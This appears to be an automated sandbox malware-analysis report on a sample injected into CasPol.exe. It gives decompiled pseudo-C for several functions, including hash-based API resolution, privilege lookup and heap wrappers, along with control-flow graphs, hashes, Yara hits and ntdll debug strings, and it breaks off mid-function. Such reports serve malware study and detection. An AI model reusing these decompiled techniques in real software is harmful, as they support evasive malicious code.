                                                                  control_flow_graph 132 4099a7-4099aa 133 409930-409967 call 420c83 call 40cf93 call 402e93 call 4195b3 132->133 134 4099ac-4099b2 132->134 143 4099a0-4099a6 133->143 144 409969-40997a PostThreadMessageW 133->144 144->143 145 40997c-40999d call 40c663 144->145 145->143
                                                                  C-Code - Quality: 75%
                                                                  			E004099A7(void* __eax, void* __ebx, void* __edx, signed int __esi, intOrPtr _a8, int _a12, char* _a16) {
				intOrPtr _v0;
				char* _v8;
				char* _v12;
				char _v64;
				char* _v132;
				char* _v136;
				char _v656;
				char* _v668;
				char _v688;
				char* _v692;
				intOrPtr __edi;
				void* _t64;
				int _t66;
				char* _t73;
				long _t79;
				int _t82;
				signed int _t84;

				_t84 = __esi * 0xffffffef;
				_t90 = _t84;
				if(_t84 > 0) {
					E00420C83(_t73, 3);
					_t70 = _a8;
					_t64 = E0040CF93(_t90, _a8 + 0x20,  &_v64); // executed
					_t66 = E004195B3(_a8 + 0x20, _t64, 0, 0, E00402E93(0xe49e13e4));
					_t82 = _t66;
					if(_t82 != 0) {
						_t79 = _a12;
						_t66 = PostThreadMessageW(_t79, 0x111, 0, 0); // executed
						if(_t66 == 0) {
							_t66 =  *_t82(_t79, 0x8003, _t84 + (E0040C663(1, 8, _t70 + 0x39c) & 0x000000ff) - 0x40, _t66);
						}
					}
					return _t66;
				} else {
					__eax = __eax + 0x90e7dfc8;
					__ebx = __ebx + 1;
					__eflags = __ebx;
					_push(__edx);
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x2ac;
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					__eax = 0;
					_v12 = 0;
					_v692 = 0;
					 &_v688 = E004201D3( &_v688, 0, 0x2a4);
					__esi = _a12;
					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _v0;
					__eax = E00409913(__eflags, __edi,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E0041FA23(__ecx);
					_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t15;
					_a12 = 0;
					while(1) {
						__eax = E00410363(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E0041E733(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L12:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L16;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L12;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L12;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E00420153(_a12,  &_v688, 0x2a8);
										L16:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E0041E6C3(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
											__edx =  *((intOrPtr*)(__esi + 0x2d0));
											_t35 = __esi + 0x2e8; // 0x2e8
											__eax = _t35;
											 *_t35 = _v136;
											__eax = _a12;
											_t37 = __esi + 0x314; // 0x314
											__ebx = _t37;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E0041DF43(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t45 = __esi + 0x2e0; // 0x2e0
												__eax = _t45;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
												 *__ebx = 0x18;
												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
												__eax = E0041DF83(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
													__eax = E0041F6C3(__ecx);
													__ebx = __eax;
													__eax =  *((intOrPtr*)(__ebx + 0x28));
													__eax = E00420373( *((intOrPtr*)(__ebx + 0x28)));
													__edx =  *((intOrPtr*)(__ebx + 0x28));
													_t60 = __eax + 2; // 0x2
													__ecx = __eax + _t60;
													__eax = E00420153(__esi,  *((intOrPtr*)(__ebx + 0x28)), __eax + _t60);
													__eax =  &_v656;
													_push( &_v656);
													__eax = E004191A3(); // executed
													__esp = __esp + 0x28;
													__edi = __edi;
													_pop(__esi);
													__ebx = 2;
													__esp = __ebp;
													__ebp = 0;
													return __eax;
												}
											}
										}
									} else {
										goto L12;
									}
								}
							}
						}
						goto L20;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L20:
			}




















                                                                  0x004099a7
                                                                  0x004099a7
                                                                  0x004099aa
                                                                  0x00409933
                                                                  0x00409938
                                                                  0x00409943
                                                                  0x0040995b
                                                                  0x00409960
                                                                  0x00409967
                                                                  0x00409969
                                                                  0x00409976
                                                                  0x0040997a
                                                                  0x0040999e
                                                                  0x0040999e
                                                                  0x0040997a
                                                                  0x004099a6
                                                                  0x004099ac
                                                                  0x004099ac
                                                                  0x004099b1
                                                                  0x004099b1
                                                                  0x004099b2
                                                                  0x004099b3
                                                                  0x004099b4
                                                                  0x004099b6
                                                                  0x004099bc
                                                                  0x004099bd
                                                                  0x004099be
                                                                  0x004099bf
                                                                  0x004099c7
                                                                  0x004099ca
                                                                  0x004099d7
                                                                  0x004099dc
                                                                  0x004099df
                                                                  0x004099e5
                                                                  0x004099ea
                                                                  0x004099f2
                                                                  0x004099fd
                                                                  0x004099fd
                                                                  0x00409a04
                                                                  0x00409a13
                                                                  0x00409a19
                                                                  0x00409a1e
                                                                  0x00409a2b
                                                                  0x00409a35
                                                                  0x00409a3d
                                                                  0x00409a43
                                                                  0x00409a45
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409a47
                                                                  0x00409a4f
                                                                  0x00409a69
                                                                  0x00409a69
                                                                  0x00409a6c
                                                                  0x00409a6d
                                                                  0x00409a70
                                                                  0x00409a73
                                                                  0x00000000
                                                                  0x00409a75
                                                                  0x00409a75
                                                                  0x00000000
                                                                  0x00409a75
                                                                  0x00409a51
                                                                  0x00409a51
                                                                  0x00409a58
                                                                  0x00000000
                                                                  0x00409a5a
                                                                  0x00409a5a
                                                                  0x00409a61
                                                                  0x00000000
                                                                  0x00409a63
                                                                  0x00409a63
                                                                  0x00409a67
                                                                  0x00409a83
                                                                  0x00409a8b
                                                                  0x00409a93
                                                                  0x00409a98
                                                                  0x00409aa0
                                                                  0x00409aa0
                                                                  0x00409aa8
                                                                  0x00409ab0
                                                                  0x00409ab2
                                                                  0x00000000
                                                                  0x00409ab4
                                                                  0x00409ab4
                                                                  0x00409aba
                                                                  0x00409abd
                                                                  0x00409ac3
                                                                  0x00409ac6
                                                                  0x00409acc
                                                                  0x00409acc
                                                                  0x00409ad3
                                                                  0x00409ad5
                                                                  0x00409ad8
                                                                  0x00409ad8
                                                                  0x00409adf
                                                                  0x00409ae2
                                                                  0x00409ae9
                                                                  0x00409aef
                                                                  0x00409af5
                                                                  0x00409afb
                                                                  0x00409b01
                                                                  0x00409b07
                                                                  0x00409b0d
                                                                  0x00409b12
                                                                  0x00409b17
                                                                  0x00409b1d
                                                                  0x00409b1f
                                                                  0x00000000
                                                                  0x00409b25
                                                                  0x00409b25
                                                                  0x00409b28
                                                                  0x00409b28
                                                                  0x00409b2f
                                                                  0x00409b35
                                                                  0x00409b3b
                                                                  0x00409b41
                                                                  0x00409b47
                                                                  0x00409b53
                                                                  0x00409b5b
                                                                  0x00409b61
                                                                  0x00409b67
                                                                  0x00409b71
                                                                  0x00409b79
                                                                  0x00409b7f
                                                                  0x00409b81
                                                                  0x00000000
                                                                  0x00409b87
                                                                  0x00409b87
                                                                  0x00409b8d
                                                                  0x00409b8d
                                                                  0x00409b93
                                                                  0x00409ba0
                                                                  0x00409ba2
                                                                  0x00409ba6
                                                                  0x00409bab
                                                                  0x00409bae
                                                                  0x00409bae
                                                                  0x00409bb5
                                                                  0x00409bbe
                                                                  0x00409bc4
                                                                  0x00409bc6
                                                                  0x00409bcb
                                                                  0x00409bce
                                                                  0x00409bcf
                                                                  0x00409bd0
                                                                  0x00409bd1
                                                                  0x00409bd3
                                                                  0x00409bd4
                                                                  0x00409bd4
                                                                  0x00409b81
                                                                  0x00409b1f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00409a67
                                                                  0x00409a61
                                                                  0x00409a58
                                                                  0x00000000
                                                                  0x00409a4f
                                                                  0x00409a7a
                                                                  0x00409a7b
                                                                  0x00409a7c
                                                                  0x00409a7c
                                                                  0x00409a7e
                                                                  0x00409a7f
                                                                  0x00409a81
                                                                  0x00409a82
                                                                  0x00409a82
                                                                  0x00000000

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
                                                                  • Instruction ID: 648afeff1364fdba1a395c652430271767a4361657bae9f95ab056a44fdb6ef5
                                                                  • Opcode Fuzzy Hash: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
                                                                  • Instruction Fuzzy Hash: D201A7B2A4031476E6215651EC83FAF2358DB84B14F14412EFE04BA2C2D5EDAD0546E9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E863 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 186 41e863-41e894 call 41f203 RtlAllocateHeap
                                                                  C-Code - Quality: 100%
                                                                  			E0041E863(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                  0x0041e872
                                                                  0x0041e87a
                                                                  0x0041e890
                                                                  0x0041e894

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00418C66,?,00419410,00419410,?,00418C66,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E890
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                  • Instruction ID: 141f3d952d026ec1b8dbe03c6c75eaaf96d710a32fd8771451468f3a68ee1817
                                                                  • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                  • Instruction Fuzzy Hash: 60E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C630F914CAF1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004100C3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 181 4100c3-4100e7 call 4195b3 184 4100e9-4100ea 181->184 185 4100eb-4100fc GetUserGeoID 181->185
                                                                  C-Code - Quality: 37%
                                                                  			E004100C3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                  0x004100dd
                                                                  0x004100e7
                                                                  0x004100ed
                                                                  0x004100fc
                                                                  0x004100ea
                                                                  0x004100ea
                                                                  0x004100ea

                                                                  APIs
                                                                  • GetUserGeoID.KERNELBASE(00000010), ref: 004100ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: User
                                                                  • String ID:
                                                                  • API String ID: 765557111-0
                                                                  • Opcode ID: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
                                                                  • Instruction ID: d3a3e2032565f6d34a55456b5a80270182852c25dcf9d34bac0e0dafc7ea0ddc
                                                                  • Opcode Fuzzy Hash: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
                                                                  • Instruction Fuzzy Hash: 62E0C27378030467FA2091A59C42FBA364F5B84B00F048475F90CE62C2D5A8E8C00028
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E8A3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 189 41e8a3-41e8b9 190 41e8bf-41e8d4 RtlFreeHeap 189->190 191 41e8ba call 41f203 189->191 191->190
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                  • Instruction ID: 81649b4115f882acd630a205a6666d0b6fa7ed995dd6d0d074ea88b8b0e80a3e
                                                                  • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                  • Instruction Fuzzy Hash: 1EE012B6600208ABCB14EF89DC49EA737ACAF88754F018059FE095B282C630E914CAB1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041EA03 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0041EA03(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F203( *((intOrPtr*)(_a4 + 0x6d4)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x6d4)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                  0x0041ea1d
                                                                  0x0041ea33
                                                                  0x0041ea37

                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                  • Instruction ID: 26638fb517edf30d6313ba082fa82f18f9a37f2b762b1a37e3fac1042cbd1374
                                                                  • Opcode Fuzzy Hash: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                  • Instruction Fuzzy Hash: 83E01AB56002086BC710DF89DC45EE737ADAF88654F014065FE0857242C635E8148BB5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E8D7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 68%
                                                                  			E0041E8D7(intOrPtr _a4, int _a8) {

				asm("adc eax, 0xbb2eba75");
				_t7 = _a4;
				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t7, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                  0x0041e8d7
                                                                  0x0041e8e6
                                                                  0x0041e8fd
                                                                  0x0041e90b

                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: a5fb50388cdf821a489fea839f38f53be1195a719a8b2915b7934d74684e0527
                                                                  • Instruction ID: 5c0109bf3c017ec3e38722d5e3a7691f356bf1999787dbf9d42864a55b6ec0fa
                                                                  • Opcode Fuzzy Hash: a5fb50388cdf821a489fea839f38f53be1195a719a8b2915b7934d74684e0527
                                                                  • Instruction Fuzzy Hash: E3E08C36A00210BBCB209F85CC86FD737A8EF85690F1480A8B9595B341D278EA41C7E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E8E3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0041E8E3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                  0x0041e8e6
                                                                  0x0041e8fd
                                                                  0x0041e90b

                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: 191224e0ceac810c9efb7ccbd1f96fb57d99ee79d09e325168da16ef873e870b
                                                                  • Instruction ID: b4e5e56741419d1f277733bd979a6942edbd6e735fed61574da432c381a3350b
                                                                  • Opcode Fuzzy Hash: 191224e0ceac810c9efb7ccbd1f96fb57d99ee79d09e325168da16ef873e870b
                                                                  • Instruction Fuzzy Hash: 34D0C232B002047BC620DF88CC45FD3379CDF44650F0080A5BA0C5B241C631BA00C7E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E897 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                  • Instruction ID: 750e433a6b7849f822becc92f6b04cfcf815011e590c3758b4f193371c1a9ae6
                                                                  • Opcode Fuzzy Hash: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                  • Instruction Fuzzy Hash: 18E0C2B92083846FD700EF65C8408E77BA4EF89304714889EFCEA47202C331D86A8BB0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0143967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: dd0cb9ff169640ca7669cc242ecdf015d4e57fb9a150917db41a03b84e8283b2
                                                                  • Instruction ID: c4a5c7a46777d4f9b6b0a3e630eea435ca492c93f056e880eef2ddc811e915ca
                                                                  • Opcode Fuzzy Hash: dd0cb9ff169640ca7669cc242ecdf015d4e57fb9a150917db41a03b84e8283b2
                                                                  • Instruction Fuzzy Hash: B3B09B71D064C5C6F611D7A44608717790477D4745F16C053D1060692B4778C091F5B5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 014AB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • The resource is owned shared by %d threads, xrefs: 014AB37E
                                                                  • *** then kb to get the faulting stack, xrefs: 014AB51C
                                                                  • The instruction at %p tried to %s , xrefs: 014AB4B6
                                                                  • The resource is owned exclusively by thread %p, xrefs: 014AB374
                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014AB3D6
                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 014AB2DC
                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 014AB47D
                                                                  • write to, xrefs: 014AB4A6
                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 014AB2F3
                                                                  • an invalid address, %p, xrefs: 014AB4CF
                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 014AB484
                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 014AB314
                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014AB38F
                                                                  • *** Inpage error in %ws:%s, xrefs: 014AB418
                                                                  • Go determine why that thread has not released the critical section., xrefs: 014AB3C5
                                                                  • The instruction at %p referenced memory at %p., xrefs: 014AB432
                                                                  • *** enter .exr %p for the exception record, xrefs: 014AB4F1
                                                                  • a NULL pointer, xrefs: 014AB4E0
                                                                  • <unknown>, xrefs: 014AB27E, 014AB2D1, 014AB350, 014AB399, 014AB417, 014AB48E
                                                                  • The critical section is owned by thread %p., xrefs: 014AB3B9
                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 014AB39B
                                                                  • read from, xrefs: 014AB4AD, 014AB4B2
                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 014AB53F
                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 014AB352
                                                                  • This failed because of error %Ix., xrefs: 014AB446
                                                                  • *** enter .cxr %p for the context, xrefs: 014AB50D
                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 014AB476
                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 014AB48F
                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 014AB323
                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 014AB305
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                  • API String ID: 0-108210295
                                                                  • Opcode ID: ea944c781b244ba2d8580e41b67c9cfba35b85ddbc60b57032883da5c9448dc2
                                                                  • Instruction ID: 17a82652392b88a07e45d6ff40982f3051a3c18d97aedcda8dd4cb9375af480c
                                                                  • Opcode Fuzzy Hash: ea944c781b244ba2d8580e41b67c9cfba35b85ddbc60b57032883da5c9448dc2
                                                                  • Instruction Fuzzy Hash: A1813131A00220FFDB21BA4A9C49D6F3B66EF76A59F82405AF5052F372D3718452C7A2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014751BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 77%
                                                                  			E014751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x14d05f0);
				E0144D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					L0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
